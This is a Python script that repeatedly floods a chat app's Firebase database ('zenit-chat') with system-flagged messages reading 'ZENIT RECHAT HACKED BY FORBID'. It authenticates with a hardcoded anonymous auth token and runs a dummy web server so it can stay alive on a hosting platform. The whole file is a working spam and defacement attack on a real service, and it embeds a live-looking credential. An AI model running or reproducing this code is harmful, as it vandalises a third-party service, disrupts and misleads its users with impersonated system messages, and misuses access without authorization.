import json
import urllib.request
import urllib.error
import time
import asyncio
import threading
import os
from http.server import BaseHTTPRequestHandler, HTTPServer

FIREBASE_URL = "https://zenit-chat-8df28-default-rtdb.firebaseio.com/chat.json"
AUTH_TOKEN = (
    "eyJhbGciOiJSUzI1NiIsImtpZCI6IjJmMjk1MGEyNGFlYWRkMjYzYzIxM2I2MDNhZjMxN"
    "WEzMjdiNmM3MjAiLCJ0eXAiOiJKV1QifQ.eyJwcm92aWRlcl9pZCI6ImFub255bW91cy"
    "IsImlzcyI6Imh0dHBzOi8vc2VjdXJldG9rZW4uZ29vZ2xlLmNvbS9hcmVzLWNoYXQtZj"
    "c3OTQiLCJhdWQiOiJhcmVzLWNoYXQtZjc3OTQiLCJhdXRoX3RpbWUiOjE3ODIwNjYzOT"
    "ksInVzZXJfaWQiOiJ6NUpUYkNTUmZLZVhjaUF3NXR5dm9mR05FOTQyIiwic3ViIjoiej"
    "VKVGJDU1JmS2VYY2lBdzV0eXZvZkdORTk0MiIsImlhdCI6MTc4MjA2NjM5OSwiZXhwIj"
    "oxNzgyMDY5OTk5LCJmaXJlYmFzZSI6eyJpZGVudGl0aWVzIjp7fSwic2lnbl9pbl9wcm"
    "92aWRlciI6ImFub255bW91cyJ9fQ.TJEyP1YWiUh6C9H80UKQWpOViO7LRTxdtNzyHiv"
    "c0qEocL1MLqTOBZJuuFTlfQwJfddwzEoBJq0ydEP6pqfrWAY47-sxqwsq_2n9pgq0pwF"
    "CiCPl84PXYUc-No90Zw_g0MS1rGnNrgpOWaKyx2aWv35jVQN-jcoa2L7Sqsk5Al_SaBO"
    "gqwllpnYjr_UebO6ET8vXv3huKXeaTwTKZpGwQcYil9A-YFCQSfjSjhIf8XaQfzByxS2"
    "KAB-tmlAYpgXTOc_-qatdhwN7W6T54puEBgkB1YM1IYKe-ryGtCpfPMEyrOIeaHppD0x"
    "Z7GE6U-uoA7DYFxeBQ8Nnd7OtdT8ZLg"
)

# --- 1. THE DUMMY WEB SERVER ---
class DummyHandler(BaseHTTPRequestHandler):
    def do_GET(self):
        # This responds to Render's health checks
        self.send_response(200)
        self.send_header('Content-type', 'text/plain')
        self.end_headers()
        self.wfile.write(b"FORB1D Engine is Online.")

def run_dummy_server():
    # Render dynamically assigns a port, we must bind to it
    port = int(os.environ.get("PORT", 8080))
    server = HTTPServer(('0.0.0.0', port), DummyHandler)
    print(f"[SYSTEM] Dummy web server listening on port {port} to satisfy Render...")
    server.serve_forever()

# --- 2. THE FIREBASE LOGIC ---
def push_to_firebase(data_bytes):
    url = f"{FIREBASE_URL}?auth={AUTH_TOKEN}"
    req = urllib.request.Request(
        url, data=data_bytes, headers={'Content-Type': 'application/json'}, method='PATCH'
    )
    try:
        with urllib.request.urlopen(req) as response:
            return response.read().decode('utf-8')
    except Exception as e:
        return f"Error: {e}"

async def loop_messages_forever(delay_seconds=1.5):
    print("[SYSTEM] Starting infinite broadcast loop...")
    count = 1
    while True:
        timestamp_ms = int(time.time() * 1000)
        custom_key = f"00{timestamp_ms}"
        
        payload = {
            custom_key: {
                                "Content": f"⚡ZENIT RECHAT HACKED BY FORBID🔥⚡ZENIT RECHAT HACKED BY FORBID🔥⚡ZENIT RECHAT HACKED BY FORBID🔥⚡ZENIT RECHAT HACKED BY FORBID🔥⚡ZENIT RECHAT HACKED BY FORBID🔥⚡ZENIT RECHAT HACKED BY FORBID🔥⚡ZENIT RECHAT HACKED BY FORBID🔥⚡ZENIT RECHAT HACKED BY FORBID🔥⚡ZENIT RECHAT HACKED BY FORBID🔥⚡ZENIT RECHAT HACKED BY FORBID🔥⚡ZENIT RECHAT HACKED BY FORBID🔥⚡ZENIT RECHAT HACKED BY FORBID🔥⚡ZENIT RECHAT HACKED BY FORBID🔥⚡ZENIT RECHAT HACKED BY FORBID🔥⚡ZENIT RECHAT HACKED BY FORBID🔥⚡ZENIT RECHAT HACKED BY FORBID🔥⚡ZENIT RECHAT HACKED BY FORBID🔥⚡ZENIT RECHAT HACKED BY FORBID🔥⚡ZENIT RECHAT HACKED BY FORBID🔥⚡ZENIT RECHAT HACKED BY FORBID🔥⚡ZENIT RECHAT HACKED BY FORBID🔥⚡ZENIT RECHAT HACKED BY FORBID🔥⚡ZENIT RECHAT HACKED BY FORBID🔥⚡ZENIT RECHAT HACKED BY FORBID🔥⚡ZENIT RECHAT HACKED BY FORBID🔥⚡ZENIT RECHAT HACKED BY FORBID🔥⚡ZENIT RECHAT HACKED BY FORBID🔥⚡ZENIT RECHAT HACKED BY FORBID🔥⚡ZENIT RECHAT HACKED BY FORBID🔥⚡ZENIT RECHAT HACKED BY FORBID🔥⚡ZENIT RECHAT HACKED BY FORBID🔥⚡ZENIT RECHAT HACKED BY FORBID🔥⚡ZENIT RECHAT HACKED BY FORBID🔥⚡ZENIT RECHAT HACKED BY FORBID🔥⚡ZENIT RECHAT HACKED BY FORBID🔥⚡ZENIT RECHAT HACKED BY FORBID🔥⚡ZENIT RECHAT HACKED BY FORBID🔥⚡ZENIT RECHAT HACKED BY FORBID🔥⚡ZENIT RECHAT HACKED BY FORBID🔥⚡ZENIT RECHAT HACKED BY FORBID🔥⚡ZENIT RECHAT HACKED BY FORBID🔥⚡ZENIT RECHAT HACKED BY FORBID🔥⚡ZENIT RECHAT HACKED BY FORBID🔥⚡ZENIT RECHAT HACKED BY FORBID🔥⚡ZENIT RECHAT HACKED BY FORBID🔥⚡ZENIT RECHAT HACKED BY FORBID🔥⚡ZENIT RECHAT HACKED BY FORBID🔥⚡ZENIT RECHAT HACKED BY FORBID🔥⚡ZENIT RECHAT HACKED BY FORBID🔥⚡ZENIT RECHAT HACKED BY FORBID🔥⚡ZENIT RECHAT HACKED BY FORBID🔥⚡ZENIT RECHAT HACKED BY FORBID🔥⚡ZENIT RECHAT HACKED BY FORBID🔥⚡ZENIT RECHAT HACKED BY FORBID🔥⚡ZENIT RECHAT HACKED BY FORBID🔥⚡ZENIT RECHAT HACKED BY FORBID🔥⚡ZENIT RECHAT HACKED BY FORBID🔥⚡ZENIT RECHAT HACKED BY FORBID🔥⚡ZENIT RECHAT HACKED BY FORBID🔥⚡ZENIT RECHAT HACKED BY FORBID🔥⚡ZENIT RECHAT HACKED BY FORBID🔥⚡ZENIT RECHAT HACKED BY FORBID🔥⚡ZENIT RECHAT HACKED BY FORBID🔥⚡ZENIT RECHAT HACKED BY FORBID🔥⚡ZENIT RECHAT HACKED BY FORBID🔥⚡ZENIT RECHAT HACKED BY FORBID🔥⚡ZENIT RECHAT HACKED BY FORBID🔥⚡ZENIT RECHAT HACKED BY FORBID🔥⚡ZENIT RECHAT HACKED BY FORBID🔥⚡ZENIT RECHAT HACKED BY FORBID🔥⚡ZENIT RECHAT HACKED BY FORBID🔥⚡ZENIT RECHAT HACKED BY FORBID🔥⚡ZENIT RECHAT HACKED BY FORBID🔥⚡ZENIT RECHAT HACKED BY FORBID🔥⚡ZENIT RECHAT HACKED BY FORBID🔥⚡ZENIT RECHAT HACKED BY FORBID🔥⚡ZENIT RECHAT HACKED BY FORBID🔥⚡ZENIT RECHAT HACKED BY FORBID🔥⚡ZENIT RECHAT HACKED BY FORBID🔥⚡ZENIT RECHAT HACKED BY FORBID🔥⚡ZENIT RECHAT HACKED BY FORBID🔥⚡ZENIT RECHAT HACKED BY FORBID🔥⚡ZENIT RECHAT HACKED BY FORBID🔥⚡ZENIT RECHAT HACKED BY FORBID🔥⚡ZENIT RECHAT HACKED BY FORBID🔥⚡ZENIT RECHAT HACKED BY FORBID🔥⚡ZENIT RECHAT HACKED BY FORBID🔥⚡ZENIT RECHAT HACKED BY FORBID🔥⚡ZENIT RECHAT HACKED BY FORBID🔥⚡ZENIT RECHAT HACKED BY FORBID🔥⚡ZENIT RECHAT HACKED BY FORBID🔥⚡ZENIT RECHAT HACKED BY FORBID🔥⚡ZENIT RECHAT HACKED BY FORBID🔥⚡ZENIT RECHAT HACKED BY FORBID🔥⚡ZENIT RECHAT HACKED BY FORBID🔥⚡ZENIT RECHAT HACKED BY FORBID🔥⚡ZENIT RECHAT HACKED BY FORBID🔥⚡ZENIT RECHAT HACKED BY FORBID🔥⚡ZENIT RECHAT HACKED BY FORBID🔥⚡ZENIT RECHAT HACKED BY FORBID🔥⚡ZENIT RECHAT HACKED BY FORBID🔥⚡ZENIT RECHAT HACKED BY FORBID🔥⚡ZENIT RECHAT HACKED BY FORBID🔥⚡ZENIT RECHAT HACKED BY FORBID🔥⚡ZENIT RECHAT HACKED BY FORBID🔥⚡ZENIT RECHAT HACKED BY FORBID🔥⚡ZENIT RECHAT HACKED BY FORBID🔥⚡ZENIT RECHAT HACKED BY FORBID🔥⚡ZENIT RECHAT HACKED BY FORBID🔥⚡ZENIT RECHAT HACKED BY FORBID🔥⚡ZENIT RECHAT HACKED BY FORBID🔥⚡ZENIT RECHAT HACKED BY FORBID🔥⚡ZENIT RECHAT HACKED BY FORBID🔥⚡ZENIT RECHAT HACKED BY FORBID🔥⚡ZENIT RECHAT HACKED BY FORBID🔥⚡ZENIT RECHAT HACKED BY FORBID🔥⚡ZENIT RECHAT HACKED BY FORBID🔥⚡ZENIT RECHAT HACKED BY FORBID🔥⚡ZENIT RECHAT HACKED BY FORBID🔥⚡ZENIT RECHAT HACKED BY FORBID🔥⚡ZENIT RECHAT HACKED BY FORBID🔥⚡ZENIT RECHAT HACKED BY FORBID🔥⚡ZENIT RECHAT HACKED BY FORBID🔥⚡ZENIT RECHAT HACKED BY FORBID🔥⚡ZENIT RECHAT HACKED BY FORBID🔥⚡ZENIT RECHAT HACKED BY FORBID🔥⚡ZENIT RECHAT HACKED BY FORBID🔥⚡ZENIT RECHAT HACKED BY FORBID🔥⚡ZENIT RECHAT HACKED BY FORBID🔥⚡ZENIT RECHAT HACKED BY FORBID🔥⚡ZENIT RECHAT HACKED BY FORBID🔥⚡ZENIT RECHAT HACKED BY FORBID🔥⚡ZENIT RECHAT HACKED BY FORBID🔥⚡ZENIT RECHAT HACKED BY FORBID🔥⚡ZENIT RECHAT HACKED BY FORBID🔥⚡ZENIT RECHAT HACKED BY FORBID🔥⚡ZENIT RECHAT HACKED BY FORBID🔥⚡ZENIT RECHAT HACKED BY FORBID🔥⚡ZENIT RECHAT HACKED BY FORBID🔥⚡ZENIT RECHAT HACKED BY FORBID🔥⚡ZENIT RECHAT HACKED BY FORBID🔥⚡ZENIT RECHAT HACKED BY FORBID🔥⚡ZENIT RECHAT HACKED BY FORBID🔥⚡ZENIT RECHAT HACKED BY FORBID🔥⚡ZENIT RECHAT HACKED BY FORBID🔥⚡ZENIT RECHAT HACKED BY FORBID🔥⚡ZENIT RECHAT HACKED BY FORBID🔥⚡ZENIT RECHAT HACKED BY FORBID🔥⚡ZENIT RECHAT HACKED BY FORBID🔥⚡ZENIT RECHAT HACKED BY FORBID🔥⚡ZENIT RECHAT HACKED BY FORBID🔥 #{count} ⚡",
                "IsAutoClean": False,
                "IsSystem": True,
                "Sender": "FORB1D🔥",
                "SenderUid": 9685313117,
                "Server": "⚡ZENIT RECHAT HACKED BY FORBID🔥⚡ZENIT RECHAT HACKED BY FORBID🔥⚡ZENIT RECHAT HACKED BY FORBID🔥⚡ZENIT RECHAT HACKED BY FORBID🔥⚡ZENIT RECHAT HACKED BY FORBID🔥⚡ZENIT RECHAT HACKED BY FORBID🔥⚡ZENIT RECHAT HACKED BY FORBID🔥⚡ZENIT RECHAT HACKED BY FORBID🔥⚡ZENIT RECHAT HACKED BY FORBID🔥⚡ZENIT RECHAT HACKED BY FORBID🔥⚡ZENIT RECHAT HACKED BY FORBID🔥⚡ZENIT RECHAT HACKED BY FORBID🔥⚡ZENIT RECHAT HACKED BY FORBID🔥⚡ZENIT RECHAT HACKED BY FORBID🔥⚡ZENIT RECHAT HACKED BY FORBID🔥⚡ZENIT RECHAT HACKED BY FORBID🔥⚡ZENIT RECHAT HACKED BY FORBID🔥⚡ZENIT RECHAT HACKED BY FORBID🔥⚡ZENIT RECHAT HACKED BY FORBID🔥⚡ZENIT RECHAT HACKED BY FORBID🔥⚡ZENIT RECHAT HACKED BY FORBID🔥⚡ZENIT RECHAT HACKED BY FORBID🔥⚡ZENIT RECHAT HACKED BY FORBID🔥⚡ZENIT RECHAT HACKED BY FORBID🔥⚡ZENIT RECHAT HACKED BY FORBID🔥⚡ZENIT RECHAT HACKED BY FORBID🔥⚡ZENIT RECHAT HACKED BY FORBID🔥⚡ZENIT RECHAT HACKED BY FORBID🔥⚡ZENIT RECHAT HACKED BY FORBID🔥⚡ZENIT RECHAT HACKED BY FORBID🔥⚡ZENIT RECHAT HACKED BY FORBID🔥⚡ZENIT RECHAT HACKED BY FORBID🔥⚡ZENIT RECHAT HACKED BY FORBID🔥⚡ZENIT RECHAT HACKED BY FORBID🔥⚡ZENIT RECHAT HACKED BY FORBID🔥⚡ZENIT RECHAT HACKED BY FORBID🔥⚡ZENIT RECHAT HACKED BY FORBID🔥⚡ZENIT RECHAT HACKED BY FORBID🔥⚡ZENIT RECHAT HACKED BY FORBID🔥⚡ZENIT RECHAT HACKED BY FORBID🔥⚡ZENIT RECHAT HACKED BY FORBID🔥⚡ZENIT RECHAT HACKED BY FORBID🔥⚡ZENIT RECHAT HACKED BY FORBID🔥⚡ZENIT RECHAT HACKED BY FORBID🔥⚡ZENIT RECHAT HACKED BY FORBID🔥⚡ZENIT RECHAT HACKED BY FORBID🔥⚡ZENIT RECHAT HACKED BY FORBID🔥⚡ZENIT RECHAT HACKED BY FORBID🔥⚡ZENIT RECHAT HACKED BY FORBID🔥⚡ZENIT RECHAT HACKED BY FORBID🔥⚡ZENIT RECHAT HACKED BY FORBID🔥⚡ZENIT RECHAT HACKED BY FORBID🔥⚡ZENIT RECHAT HACKED BY FORBID🔥⚡ZENIT RECHAT HACKED BY FORBID🔥⚡ZENIT RECHAT HACKED BY FORBID🔥⚡ZENIT RECHAT HACKED BY FORBID🔥⚡ZENIT RECHAT HACKED BY FORBID🔥⚡ZENIT RECHAT HACKED BY FORBID🔥⚡ZENIT RECHAT HACKED BY FORBID🔥⚡ZENIT RECHAT HACKED BY FORBID🔥⚡ZENIT RECHAT HACKED BY FORBID🔥⚡ZENIT RECHAT HACKED BY FORBID🔥⚡ZENIT RECHAT HACKED BY FORBID🔥⚡ZENIT RECHAT HACKED BY FORBID🔥⚡ZENIT RECHAT HACKED BY FORBID🔥⚡ZENIT RECHAT HACKED BY FORBID🔥⚡ZENIT RECHAT HACKED BY FORBID🔥⚡ZENIT RECHAT HACKED BY FORBID🔥⚡ZENIT RECHAT HACKED BY FORBID🔥⚡ZENIT RECHAT HACKED BY FORBID🔥⚡ZENIT RECHAT HACKED BY FORBID🔥⚡ZENIT RECHAT HACKED BY FORBID🔥⚡ZENIT RECHAT HACKED BY FORBID🔥⚡ZENIT RECHAT HACKED BY FORBID🔥⚡ZENIT RECHAT HACKED BY FORBID🔥⚡ZENIT RECHAT HACKED BY FORBID🔥⚡ZENIT RECHAT HACKED BY FORBID🔥⚡ZENIT RECHAT HACKED BY FORBID🔥⚡ZENIT RECHAT HACKED BY FORBID🔥⚡ZENIT RECHAT HACKED BY FORBID🔥⚡ZENIT RECHAT HACKED BY FORBID🔥⚡ZENIT RECHAT HACKED BY FORBID🔥⚡ZENIT RECHAT HACKED BY FORBID🔥⚡ZENIT RECHAT HACKED BY FORBID🔥⚡ZENIT RECHAT HACKED BY FORBID🔥⚡ZENIT RECHAT HACKED BY FORBID🔥⚡ZENIT RECHAT HACKED BY FORBID🔥⚡ZENIT RECHAT HACKED BY FORBID🔥⚡ZENIT RECHAT HACKED BY FORBID🔥⚡ZENIT RECHAT HACKED BY FORBID🔥⚡ZENIT RECHAT HACKED BY FORBID🔥⚡ZENIT RECHAT HACKED BY FORBID🔥⚡ZENIT RECHAT HACKED BY FORBID🔥⚡ZENIT RECHAT HACKED BY FORBID🔥⚡ZENIT RECHAT HACKED BY FORBID🔥⚡ZENIT RECHAT HACKED BY FORBID🔥⚡ZENIT RECHAT HACKED BY FORBID🔥⚡ZENIT RECHAT HACKED BY FORBID🔥⚡ZENIT RECHAT HACKED BY FORBID🔥⚡ZENIT RECHAT HACKED BY FORBID🔥⚡ZENIT RECHAT HACKED BY FORBID🔥⚡ZENIT RECHAT HACKED BY FORBID🔥⚡ZENIT RECHAT HACKED BY FORBID🔥⚡ZENIT RECHAT HACKED BY FORBID🔥⚡ZENIT RECHAT HACKED BY FORBID🔥⚡ZENIT RECHAT HACKED BY FORBID🔥⚡ZENIT RECHAT HACKED BY FORBID🔥⚡ZENIT RECHAT HACKED BY FORBID🔥⚡ZENIT RECHAT HACKED BY FORBID🔥⚡ZENIT RECHAT HACKED BY FORBID🔥⚡ZENIT RECHAT HACKED BY FORBID🔥⚡ZENIT RECHAT HACKED BY FORBID🔥⚡ZENIT RECHAT HACKED BY FORBID🔥⚡ZENIT RECHAT HACKED BY FORBID🔥⚡ZENIT RECHAT HACKED BY FORBID🔥⚡ZENIT RECHAT HACKED BY FORBID🔥⚡ZENIT RECHAT HACKED BY FORBID🔥⚡ZENIT RECHAT HACKED BY FORBID🔥⚡ZENIT RECHAT HACKED BY FORBID🔥⚡ZENIT RECHAT HACKED BY FORBID🔥⚡ZENIT RECHAT HACKED BY FORBID🔥⚡ZENIT RECHAT HACKED BY FORBID🔥⚡ZENIT RECHAT HACKED BY FORBID🔥⚡ZENIT RECHAT HACKED BY FORBID🔥⚡ZENIT RECHAT HACKED BY FORBID🔥⚡ZENIT RECHAT HACKED BY FORBID🔥⚡ZENIT RECHAT HACKED BY FORBID🔥⚡ZENIT RECHAT HACKED BY FORBID🔥⚡ZENIT RECHAT HACKED BY FORBID🔥⚡ZENIT RECHAT HACKED BY FORBID🔥⚡ZENIT RECHAT HACKED BY FORBID🔥⚡ZENIT RECHAT HACKED BY FORBID🔥⚡ZENIT RECHAT HACKED BY FORBID🔥⚡ZENIT RECHAT HACKED BY FORBID🔥⚡ZENIT RECHAT HACKED BY FORBID🔥⚡ZENIT RECHAT HACKED BY FORBID🔥⚡ZENIT RECHAT HACKED BY FORBID🔥⚡ZENIT RECHAT HACKED BY FORBID🔥⚡ZENIT RECHAT HACKED BY FORBID🔥⚡ZENIT RECHAT HACKED BY FORBID🔥⚡ZENIT RECHAT HACKED BY FORBID🔥⚡ZENIT RECHAT HACKED BY FORBID🔥⚡ZENIT RECHAT HACKED BY FORBID🔥⚡ZENIT RECHAT HACKED BY FORBID🔥⚡ZENIT RECHAT HACKED BY FORBID🔥⚡ZENIT RECHAT HACKED BY FORBID🔥⚡ZENIT RECHAT HACKED BY FORBID🔥⚡ZENIT RECHAT HACKED BY FORBID🔥⚡ZENIT RECHAT HACKED BY FORBID🔥⚡ZENIT RECHAT HACKED BY FORBID🔥⚡ZENIT RECHAT HACKED BY FORBID🔥"
            }
        }
        
        data_bytes = json.dumps(payload).encode('utf-8')
        asyncio.create_task(asyncio.to_thread(push_to_firebase, data_bytes))
        
        await asyncio.sleep(delay_seconds)
        count += 1

# --- 3. EXECUTION ---
if __name__ == "__main__":
    # Start the dummy server in a background thread so it doesn't block the loop
    threading.Thread(target=run_dummy_server, daemon=True).start()
    
    # Run the infinite Firebase loop in the main thread
    try:
        asyncio.run(loop_messages_forever(delay_seconds=0.5))
    except KeyboardInterrupt:
        print("\n🛑 Loop stopped.")
